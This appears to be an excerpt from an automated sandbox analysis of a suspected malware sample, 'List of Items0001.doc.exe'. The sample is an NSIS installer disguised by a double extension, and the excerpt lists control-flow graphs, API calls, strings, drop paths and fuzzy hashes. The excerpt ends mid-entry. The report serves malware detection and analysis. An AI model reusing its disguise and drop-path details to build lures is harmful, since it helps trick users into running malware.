                                                control_flow_graph 375 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 378 403120-403125 375->378 379 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 375->379 380 40336a-40336e 378->380 387 403243-403251 call 40302e 379->387 388 40315e 379->388 395 403322-403327 387->395 396 403257-40325a 387->396 390 403163-40317a 388->390 392 40317c 390->392 393 40317e-403187 call 4035e2 390->393 392->393 400 40318d-403194 393->400 401 4032de-4032e6 call 40302e 393->401 395->380 398 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 396->398 399 40325c-403274 call 4035f8 call 4035e2 396->399 426 4032d4-4032d9 398->426 427 4032e8-403318 call 4035f8 call 403371 398->427 399->395 421 40327a-403280 399->421 405 403210-403214 400->405 406 403196-4031aa call 406113 400->406 401->395 410 403216-40321d call 40302e 405->410 411 40321e-403224 405->411 406->411 424 4031ac-4031b3 406->424 410->411 417 403233-40323b 411->417 418 403226-403230 call 406b22 411->418 417->390 425 403241 417->425 418->417 421->395 421->398 424->411 429 4031b5-4031bc 424->429 425->387 426->380 435 40331d-403320 427->435 429->411 431 4031be-4031c5 429->431 431->411 434 4031c7-4031ce 431->434 434->411 436 4031d0-4031f0 434->436 435->395 437 403329-40333a 435->437 436->395 438 4031f6-4031fa 436->438 439 403342-403347 437->439 440 40333c 437->440 441 403202-40320a 438->441 442 4031fc-403200 438->442 443 403348-40334e 439->443 440->439 441->411 444 40320c-40320e 441->444 442->425 442->441 443->443 445 403350-403368 call 406113 443->445 444->411 445->380
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004030E4
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\List of Items0001.doc.exe,00000400), ref: 00403100
                                                  • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\List of Items0001.doc.exe,80000000,00000003), ref: 0040615C
                                                  • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\List of Items0001.doc.exe,C:\Users\user\Desktop\List of Items0001.doc.exe,80000000,00000003), ref: 00403149
                                                • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\List of Items0001.doc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 2803837635-667659242
                                                • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                Function 004066A5 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 448 4066a5-4066b0 449 4066b2-4066c1 448->449 450 4066c3-4066d9 448->450 449->450 451 4066f1-4066fa 450->451 452 4066db-4066e8 450->452 454 406700 451->454 455 4068d5-4068e0 451->455 452->451 453 4066ea-4066ed 452->453 453->451 456 406705-406712 454->456 457 4068e2-4068e6 call 406668 455->457 458 4068eb-4068ec 455->458 456->455 459 406718-406721 456->459 457->458 461 4068b3 459->461 462 406727-406764 459->462 463 4068c1-4068c4 461->463 464 4068b5-4068bf 461->464 465 406857-40685c 462->465 466 40676a-406771 462->466 467 4068c6-4068cf 463->467 464->467 468 40685e-406864 465->468 469 40688f-406894 465->469 470 406773-406775 466->470 471 406776-406778 466->471 467->455 474 406702 467->474 475 406874-406880 call 406668 468->475 476 406866-406872 call 4065af 468->476 472 4068a3-4068b1 lstrlenW 469->472 473 406896-40689e call 4066a5 469->473 470->471 477 4067b5-4067b8 471->477 478 40677a-4067a1 call 406536 471->478 472->467 473->472 474->456 490 406885-40688b 475->490 476->490 481 4067c8-4067cb 477->481 482 4067ba-4067c6 GetSystemDirectoryW 477->482 492 4067a7-4067b0 call 4066a5 478->492 493 40683e-406842 478->493 487 406834-406836 481->487 488 4067cd-4067db GetWindowsDirectoryW 481->488 486 406838-40683c 482->486 486->493 494 40684f-406855 call 4068ef 486->494 487->486 491 4067dd-4067e5 487->491 488->487 490->472 495 40688d 490->495 499 4067e7-4067f0 491->499 500 4067fc-406812 SHGetSpecialFolderLocation 491->500 492->486 493->494 497 406844-40684a lstrcatW 493->497 494->472 495->494 497->494 505 4067f8-4067fa 499->505 503 406830 500->503 504 406814-40682e SHGetPathFromIDListW CoTaskMemFree 500->504 503->487 504->486 504->503 505->486 505->500
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 004067D3
                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000), ref: 004068A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 4260037668-3511794663
                                                • Opcode ID: a56a8a4d956183f5ceef7ff9e42496adb417aa599aaeb911d527621cdebcfcc9
                                                • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                • Opcode Fuzzy Hash: a56a8a4d956183f5ceef7ff9e42496adb417aa599aaeb911d527621cdebcfcc9
                                                • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 570 40176f-401794 call 402da6 call 405fae 575 401796-40179c call 406668 570->575 576 40179e-4017b0 call 406668 call 405f37 lstrcatW 570->576 581 4017b5-4017b6 call 4068ef 575->581 576->581 585 4017bb-4017bf 581->585 586 4017c1-4017cb call 40699e 585->586 587 4017f2-4017f5 585->587 594 4017dd-4017ef 586->594 595 4017cd-4017db CompareFileTime 586->595 589 4017f7-4017f8 call 406133 587->589 590 4017fd-401819 call 406158 587->590 589->590 597 40181b-40181e 590->597 598 40188d-4018b6 call 4056ca call 403371 590->598 594->587 595->594 600 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 597->600 601 40186f-401879 call 4056ca 597->601 612 4018b8-4018bc 598->612 613 4018be-4018ca SetFileTime 598->613 600->585 634 401864-401865 600->634 610 401882-401888 601->610 614 402c33 610->614 612->613 616 4018d0-4018db CloseHandle 612->616 613->616 618 402c35-402c39 614->618 619 4018e1-4018e4 616->619 620 402c2a-402c2d 616->620 622 4018e6-4018f7 call 4066a5 lstrcatW 619->622 623 4018f9-4018fc call 4066a5 619->623 620->614 629 401901-402398 622->629 623->629 632 40239d-4023a2 629->632 633 402398 call 405cc8 629->633 632->618 633->632 634->610 635 401867-401868 634->635 635->601
                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22,?,?,00000031), ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                  • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,004030A8,004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000), ref: 00405725
                                                  • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00405737
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp$C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22$Call
                                                • API String ID: 1941528284-2054544112
                                                • Opcode ID: ae146eaacdef0e831c8dd449aef3ef234919e16d41b91f58e4b486bba6a2989e
                                                • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                • Opcode Fuzzy Hash: ae146eaacdef0e831c8dd449aef3ef234919e16d41b91f58e4b486bba6a2989e
                                                • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 636 4056ca-4056df 637 4056e5-4056f6 636->637 638 405796-40579a 636->638 639 405701-40570d lstrlenW 637->639 640 4056f8-4056fc call 4066a5 637->640 642 40572a-40572e 639->642 643 40570f-40571f lstrlenW 639->643 640->639 645 405730-405737 SetWindowTextW 642->645 646 40573d-405741 642->646 643->638 644 405721-405725 lstrcatW 643->644 644->642 645->646 647 405743-405785 SendMessageW * 3 646->647 648 405787-405789 646->648 647->648 648->638 649 40578b-40578e 648->649 649->638
                                                APIs
                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                • lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,004030A8,004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000), ref: 00405725
                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00405737
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                  • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                  • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000), ref: 004068A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll
                                                • API String ID: 1495540970-3543539532
                                                • Opcode ID: da0887550f177a20a5adca650a80eb3065253b4758cf57a6ba66e38fd01475e6
                                                • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                • Opcode Fuzzy Hash: da0887550f177a20a5adca650a80eb3065253b4758cf57a6ba66e38fd01475e6
                                                • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 650 4026ec-402705 call 402d84 653 402c2a-402c2d 650->653 654 40270b-402712 650->654 655 402c33-402c39 653->655 656 402714 654->656 657 402717-40271a 654->657 656->657 658 402720-40272f call 4065c8 657->658 659 40287e-402886 657->659 658->659 663 402735 658->663 659->653 664 40273b-40273f 663->664 665 4027d4-4027d7 664->665 666 402745-402760 ReadFile 664->666 668 4027d9-4027dc 665->668 669 4027ef-4027ff call 4061db 665->669 666->659 667 402766-40276b 666->667 667->659 672 402771-40277f 667->672 668->669 670 4027de-4027e9 call 406239 668->670 669->659 678 402801 669->678 670->659 670->669 675 402785-402797 MultiByteToWideChar 672->675 676 40283a-402846 call 4065af 672->676 675->678 679 402799-40279c 675->679 676->655 681 402804-402807 678->681 682 40279e-4027a9 679->682 681->676 684 402809-40280e 681->684 682->681 685 4027ab-4027d0 SetFilePointer MultiByteToWideChar 682->685 686 402810-402815 684->686 687 40284b-40284f 684->687 685->682 688 4027d2 685->688 686->687 691 402817-40282a 686->691 689 402851-402855 687->689 690 40286c-402878 SetFilePointer 687->690 688->678 692 402857-40285b 689->692 693 40285d-40286a 689->693 690->659 691->659 694 40282c-402832 691->694 692->690 692->693 693->659 694->664 695 402838 694->695 695->659
                                                APIs
                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                  • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 696 4069c5-4069e5 GetSystemDirectoryW 697 4069e7 696->697 698 4069e9-4069eb 696->698 697->698 699 4069fc-4069fe 698->699 700 4069ed-4069f6 698->700 702 4069ff-406a32 wsprintfW LoadLibraryExW 699->702 700->699 701 4069f8-4069fa 700->701 701->702
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                • wsprintfW.USER32 ref: 00406A17
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 703 405b99-405be4 CreateDirectoryW 704 405be6-405be8 703->704 705 405bea-405bf7 GetLastError 703->705 706 405c11-405c13 704->706 705->706 707 405bf9-405c0d SetFileSecurityW 705->707 707->704 708 405c0f GetLastError 707->708 708->706
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                • GetLastError.KERNEL32 ref: 00405BF0
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                • GetLastError.KERNEL32 ref: 00405C0F
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3449924974-787714339
                                                • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
